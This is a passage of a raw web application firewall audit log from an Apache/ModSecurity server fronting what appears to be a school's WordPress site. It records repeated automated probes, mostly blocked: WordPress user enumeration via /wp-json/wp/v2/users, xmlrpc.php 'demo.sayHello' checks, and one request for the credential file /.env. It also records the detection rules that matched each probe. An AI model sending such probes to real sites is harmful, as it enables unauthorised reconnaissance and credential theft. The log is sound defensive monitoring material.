REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746458756513925 2981 (- - -) Stopwatch2: 1746458756513925 2981; combined=1281, p1=428, p2=824, p3=0, p4=0, p5=29, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b873b830-Z-- --03b5461b-A-- [05/May/2025:22:25:59 +0700] aBjYh_ZJDMuQndL03JNUywAAAFE 103.236.140.4 50072 103.236.140.4 8181 --03b5461b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.47.174 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.47.174 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --03b5461b-C-- demo.sayHello --03b5461b-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --03b5461b-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746458759359820 6518 (- - -) Stopwatch2: 1746458759359820 6518; combined=4760, p1=596, p2=3927, p3=38, p4=40, p5=94, sr=76, sw=65, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --03b5461b-Z-- --f8fc4531-A-- [05/May/2025:22:26:01 +0700] aBjYiYZWvR7-42f6JrAFiAAAAMg 103.236.140.4 50100 103.236.140.4 8181 --f8fc4531-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.85.238 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.85.238 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --f8fc4531-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f8fc4531-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746458761575603 2890 (- - -) Stopwatch2: 1746458761575603 2890; combined=1247, p1=394, p2=820, p3=0, p4=0, p5=33, sr=71, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f8fc4531-Z-- --2ce58c4e-A-- [05/May/2025:22:26:04 +0700] aBjYjARwKNFSM6B7_LaaZQAAAJg 103.236.140.4 50132 103.236.140.4 8181 --2ce58c4e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.85.238 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.85.238 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --2ce58c4e-C-- demo.sayHello --2ce58c4e-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --2ce58c4e-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746458764369274 4557 (- - -) Stopwatch2: 1746458764369274 4557; combined=3392, p1=467, p2=2739, p3=26, p4=31, p5=75, sr=94, sw=54, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2ce58c4e-Z-- --90054e78-A-- [05/May/2025:22:26:05 +0700] aBjYjYZWvR7-42f6JrAFigAAANQ 103.236.140.4 50142 103.236.140.4 8181 --90054e78-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.36.119 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.36.119 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --90054e78-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --90054e78-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746458765566258 2965 (- - -) Stopwatch2: 1746458765566258 2965; combined=1270, p1=417, p2=823, p3=0, p4=0, p5=29, sr=80, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --90054e78-Z-- --5835a815-A-- [05/May/2025:22:26:08 +0700] aBjYkIZWvR7-42f6JrAFkwAAAMM 103.236.140.4 50172 103.236.140.4 8181 --5835a815-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.36.119 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.36.119 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --5835a815-C-- demo.sayHello --5835a815-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --5835a815-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746458768410464 5100 (- - -) Stopwatch2: 1746458768410464 5100; combined=4078, p1=518, p2=3340, p3=33, p4=34, p5=91, sr=82, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5835a815-Z-- --fd894309-A-- [05/May/2025:22:26:13 +0700] aBjYlfZJDMuQndL03JNUzgAAAFU 103.236.140.4 50228 103.236.140.4 8181 --fd894309-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.110.254 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.110.254 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --fd894309-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fd894309-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746458773714505 2515 (- - -) Stopwatch2: 1746458773714505 2515; combined=1135, p1=410, p2=699, p3=0, p4=0, p5=26, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fd894309-Z-- --0265c358-A-- [05/May/2025:22:26:16 +0700] aBjYmIZWvR7-42f6JrAFpQAAAM4 103.236.140.4 50252 103.236.140.4 8181 --0265c358-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.110.254 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.110.254 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --0265c358-C-- demo.sayHello --0265c358-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --0265c358-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746458776669389 6915 (- - -) Stopwatch2: 1746458776669389 6915; combined=4964, p1=618, p2=4089, p3=44, p4=43, p5=100, sr=75, sw=70, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0265c358-Z-- --63d4c537-A-- [05/May/2025:22:26:34 +0700] aBjYqoZWvR7-42f6JrAFvAAAANc 103.236.140.4 50368 103.236.140.4 8181 --63d4c537-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 45.202.79.21 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.202.79.21 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --63d4c537-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --63d4c537-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746458794301027 2986 (- - -) Stopwatch2: 1746458794301027 2986; combined=1317, p1=423, p2=858, p3=0, p4=0, p5=36, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --63d4c537-Z-- --316b7914-A-- [05/May/2025:22:26:37 +0700] aBjYrYZWvR7-42f6JrAFvwAAAM4 103.236.140.4 50388 103.236.140.4 8181 --316b7914-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 45.202.79.21 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.202.79.21 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --316b7914-C-- demo.sayHello --316b7914-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --316b7914-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746458797324346 5213 (- - -) Stopwatch2: 1746458797324346 5213; combined=4090, p1=531, p2=3323, p3=30, p4=33, p5=101, sr=70, sw=72, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --316b7914-Z-- --8f1c942b-A-- [05/May/2025:22:27:00 +0700] aBjYxIZWvR7-42f6JrAF3gAAAMk 103.236.140.4 50578 103.236.140.4 8181 --8f1c942b-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.95.42 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.95.42 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --8f1c942b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8f1c942b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746458820025742 3006 (- - -) Stopwatch2: 1746458820025742 3006; combined=1331, p1=473, p2=823, p3=0, p4=0, p5=35, sr=115, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8f1c942b-Z-- --5ff8485f-A-- [05/May/2025:22:27:01 +0700] aBjYxfZJDMuQndL03JNU3QAAAE8 103.236.140.4 50588 103.236.140.4 8181 --5ff8485f-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 146.190.240.206 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 146.190.240.206 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --5ff8485f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5ff8485f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746458821332774 738 (- - -) Stopwatch2: 1746458821332774 738; combined=313, p1=264, p2=0, p3=0, p4=0, p5=48, sr=73, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5ff8485f-Z-- --a28d1f66-A-- [05/May/2025:22:27:02 +0700] aBjYxoZWvR7-42f6JrAF5AAAANA 103.236.140.4 50608 103.236.140.4 8181 --a28d1f66-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.95.42 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.95.42 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --a28d1f66-C-- demo.sayHello --a28d1f66-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --a28d1f66-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746458822925626 5897 (- - -) Stopwatch2: 1746458822925626 5897; combined=4801, p1=606, p2=3958, p3=39, p4=44, p5=92, sr=77, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a28d1f66-Z-- --94ce4242-A-- [05/May/2025:22:28:37 +0700] aBjZJfZJDMuQndL03JNVCAAAAFQ 103.236.140.4 51384 103.236.140.4 8181 --94ce4242-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.214.1.12 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.214.1.12 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --94ce4242-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --94ce4242-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746458917164614 2740 (- - -) Stopwatch2: 1746458917164614 2740; combined=1268, p1=410, p2=829, p3=0, p4=0, p5=29, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --94ce4242-Z-- --298eff48-A-- [05/May/2025:22:28:39 +0700] aBjZJ4ZWvR7-42f6JrAGRwAAAMA 103.236.140.4 51404 103.236.140.4 8181 --298eff48-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.214.1.12 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.214.1.12 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --298eff48-C-- demo.sayHello --298eff48-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --298eff48-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746458919940769 5173 (- - -) Stopwatch2: 1746458919940769 5173; combined=4182, p1=522, p2=3430, p3=32, p4=35, p5=96, sr=76, sw=67, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --298eff48-Z-- --cf234c64-A-- [05/May/2025:22:30:53 +0700] aBjZrfZJDMuQndL03JNVQQAAAFU 103.236.140.4 52490 103.236.140.4 8181 --cf234c64-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.94.14.186 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.94.14.186 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --cf234c64-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --cf234c64-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746459053615725 2674 (- - -) Stopwatch2: 1746459053615725 2674; combined=1211, p1=411, p2=771, p3=0, p4=0, p5=29, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cf234c64-Z-- --9c727422-A-- [05/May/2025:22:30:56 +0700] aBjZsPZJDMuQndL03JNVQgAAAE4 103.236.140.4 52522 103.236.140.4 8181 --9c727422-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.94.14.186 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.94.14.186 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --9c727422-C-- demo.sayHello --9c727422-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --9c727422-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746459056390557 5933 (- - -) Stopwatch2: 1746459056390557 5933; combined=4387, p1=540, p2=3609, p3=31, p4=35, p5=101, sr=72, sw=71, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9c727422-Z-- --44346122-A-- [05/May/2025:22:31:10 +0700] aBjZvoZWvR7-42f6JrAGiAAAAMg 103.236.140.4 52638 103.236.140.4 8181 --44346122-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.173.248 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.173.248 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --44346122-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --44346122-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev 